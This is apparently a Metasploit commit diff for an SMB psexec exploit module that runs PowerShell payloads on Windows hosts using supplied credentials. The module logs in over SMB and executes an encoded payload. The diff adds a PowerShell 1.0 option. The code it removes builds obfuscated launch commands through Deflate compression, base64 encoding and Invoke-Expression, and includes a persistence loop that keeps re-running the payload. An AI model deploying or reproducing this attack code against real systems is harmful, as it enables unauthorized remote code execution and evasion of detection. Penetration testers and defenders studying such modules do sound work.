add libs from #1379 and allow psh 1.0 exec against older hosts
RageLtMan
parent
61cd3b55fc
commit
6ba85d4c06
|
|
@ -1,16 +1,19 @@
|
|||
# -*- coding: binary -*-
|
||||
#!/usr/bin/env ruby
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Exploit::Remote::SMB::Authenticated
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
|
||||
# Aliases for common classes
|
||||
SIMPLE = Rex::Proto::SMB::SimpleClient
|
||||
XCEPT = Rex::Proto::SMB::Exceptions
|
||||
|
|
@ -71,31 +74,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Execute powershell in 32bit compatibility mode, payloads need native arch',
|
||||
false
|
||||
]),
|
||||
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# Build the script
|
||||
command = prep_psh_payload
|
||||
def exploit
|
||||
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
|
||||
|
||||
# Try and authenticate with given credentials
|
||||
#Try and authenticate with given credentials
|
||||
if connect
|
||||
begin
|
||||
begin
|
||||
smb_login
|
||||
rescue StandardError => autherror
|
||||
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
|
||||
return
|
||||
end
|
||||
# Execute the powershell command
|
||||
begin
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
return psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
# Execute the powershell command
|
||||
begin
|
||||
print_status("#{peer} - Executing the payload...")
|
||||
#vprint_good(command)
|
||||
return psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
return false
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
|
|
@ -220,56 +224,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return true
|
||||
end
|
||||
|
||||
# Return a zlib compressed powershell script
|
||||
def compress_script(script_in)
|
||||
|
||||
# Compress using the Deflate algorithm
|
||||
compressed_stream = ::Zlib::Deflate.deflate(script_in,
|
||||
::Zlib::BEST_COMPRESSION)
|
||||
|
||||
# Base64 encode the compressed file contents
|
||||
encoded_stream = Rex::Text.encode_base64(compressed_stream)
|
||||
|
||||
# Build the powershell expression
|
||||
# Decode base64 encoded command and create a stream object
|
||||
psh_expression = "$stream = New-Object IO.MemoryStream(,"
|
||||
psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
|
||||
# Read & delete the first two bytes due to incompatibility with MS
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
psh_expression += "$stream.ReadByte()|Out-Null;"
|
||||
# Uncompress and invoke the expression (execute)
|
||||
psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
|
||||
psh_expression += "$(New-Object IO.Compression.DeflateStream("
|
||||
psh_expression += "$stream,"
|
||||
psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
|
||||
psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
|
||||
|
||||
# Convert expression to unicode
|
||||
unicode_expression = Rex::Text.to_unicode(psh_expression)
|
||||
|
||||
# Base64 encode the unicode expression
|
||||
encoded_expression = Rex::Text.encode_base64(unicode_expression)
|
||||
|
||||
return encoded_expression
|
||||
end
|
||||
|
||||
def peer
|
||||
return "#{rhost}:#{rport}"
|
||||
end
|
||||
|
||||
# Return a command-line payload configured per datastore
|
||||
def prep_psh_payload
|
||||
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.raw)
|
||||
# Run our payload in a while loop
|
||||
if datastore['PERSIST']
|
||||
fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
|
||||
sleep_time = rand(5)+5
|
||||
psh_payload = "function #{fun_name}{#{psh_payload}};while(1){Start-Sleep -s #{sleep_time};#{fun_name};1}"
|
||||
end
|
||||
# Convert to base64 for -encodedcommand execution
|
||||
psh_payload = compress_script(psh_payload)
|
||||
# Determine appropriate architecture
|
||||
ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
|
||||
command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}"
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue